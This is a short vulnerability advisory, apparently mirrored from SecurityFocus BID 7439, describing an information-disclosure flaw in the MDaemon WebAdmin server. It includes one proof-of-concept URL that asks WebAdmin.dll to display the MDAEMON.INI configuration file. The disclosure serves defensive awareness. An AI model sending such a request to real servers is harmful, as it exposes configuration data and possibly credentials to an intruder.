5 lines
No EOL
410 B
Text
5 lines
No EOL
410 B
Text
source: http://www.securityfocus.com/bid/7439/info
|
|
|
|
Reportedly, remote users can discover the installation directory of certain software on the underlying system by submitting an HTTP request to the WebAdmin server. This could allow an attacker to obtain sensitive information.
|
|
|
|
http://www.example.com/WebAdmin.dll?session=X&Program=MDaemon&Directory:Name=C:\MDaemon\App&File:Name=MDAEMON.INI&View=EditFile |